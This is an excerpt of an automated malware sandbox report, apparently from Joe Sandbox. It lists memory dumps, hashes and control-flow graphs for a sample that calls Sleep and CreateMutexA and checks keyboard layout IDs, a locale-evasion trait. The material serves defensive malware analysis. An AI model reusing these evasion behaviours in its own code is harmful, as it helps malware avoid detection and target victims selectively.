                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                          • Opcode ID: 8116ff3fa4b929d2f304f848280dbc4c266850506714b3a7d422333aa87c0e72
                                                                                                                                                                                                                                          • Instruction ID: 37ad2d8ae07224d731bb2d59931382d9567284351e4c58f65acad8a21c71fe3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8116ff3fa4b929d2f304f848280dbc4c266850506714b3a7d422333aa87c0e72
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E08C30042608AACF2A7F58DD09EC83B6EFF51744F401A10FD558A226DB35EED2C681
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1757054768.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4f30000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d610b6b2e40b13af9a23c92efaaa43aba58a667b82ea9a4cd373dba0a618f861
                                                                                                                                                                                                                                          • Instruction ID: 074be322596d26272efa14fc1fef6a9a8210b115e16f35d97418ef47d4d49d0e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d610b6b2e40b13af9a23c92efaaa43aba58a667b82ea9a4cd373dba0a618f861
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65E04FDF7880107DA04261852719AF6A76EB6C76313308477F003D650BBAC80B9EB131

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                          • API String ID: 0-3963862150
                                                                                                                                                                                                                                          • Opcode ID: 12002801b19da40c5a8fe3bcc0497d3b6c09cb83b4cd9dc4bc0f86571556fb60
                                                                                                                                                                                                                                          • Instruction ID: a61bdd2c424a3d00e359364ab88ce580333f441beb10a03d4156d963dc306181
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12002801b19da40c5a8fe3bcc0497d3b6c09cb83b4cd9dc4bc0f86571556fb60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F1C07090125CDBEB24DF54CC84BEEBBB9EF45304F5042A9F518A7282DB789A84CB95

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 185 7e9ba5-7e9d91 call 7f7a00 call 7e5c10 call 7e8b30 call 7f8220
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754724910.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754747383.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754768202.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754822300.0000000000AC5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754839458.0000000000AC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754862757.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754884931.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754903119.0000000000ADC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754920171.0000000000AE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754939311.0000000000AE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754960813.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754982004.0000000000AF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                          • Opcode ID: 8181e8780dad915ffdf479f51ba66e4fbaeba76c304759b49c86e5cb900150e6
                                                                                                                                                                                                                                          • Instruction ID: b0907dec07f6cf19ddd911967292f3addecc5c9490bf530ed4bb0d24ba5b78c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8181e8780dad915ffdf479f51ba66e4fbaeba76c304759b49c86e5cb900150e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A31AC72605244DBEB18EBBCDC8876DBBB2EBC9310F204208E100DB3E6E77D69818751

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 207 7e9f44-7e9f64 211 7e9f66-7e9f72 207->211 212 7e9f92-7e9fae 207->212 213 7e9f88-7e9f8f call 7fd663 211->213 214 7e9f74-7e9f82 211->214 215 7e9fdc-7e9ffb 212->215 216 7e9fb0-7e9fbc 212->216 213->212 214->213 219 7ea92b 214->219 217 7e9ffd-7ea009 215->217 218 7ea029-7ea916 call 7f80c0 215->218 221 7e9fbe-7e9fcc 216->221 222 7e9fd2-7e9fd9 call 7fd663 216->222 223 7ea01f-7ea026 call 7fd663 217->223 224 7ea00b-7ea019 217->224 226 7ea953-7ea994 Sleep CreateMutexA 219->226 227 7ea92b call 816c6a 219->227 221->219 221->222 222->215 223->218 224->219 224->223 237 7ea996-7ea998 226->237 238 7ea9a7-7ea9a8 226->238 227->226 237->238 239 7ea99a-7ea9a5 237->239 239->238
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 007EA963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00843254), ref: 007EA981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1753888094.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753867143.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753888094.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753959790.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1753979506.000000000084B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754003634.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754024988.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754045323.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754169501.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754191423.00000000009AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754216353.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754240291.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754260362.00000000009CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754304972.00000000009DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754326607.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754353144.00000000009EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754373289.00000000009EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754410709.0000000000A01000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754428649.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754446572.0000000000A0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754466339.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754483518.0000000000A18000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754504199.0000000000A19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754525628.0000000000A2B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754543705.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754561613.0000000000A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754578626.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754600607.0000000000A45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754617658.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754636624.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754654088.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754671678.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754689049.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1754707261.0000000000A6D000.00000080.00000001.01000000.00000003.sdmpDownload File
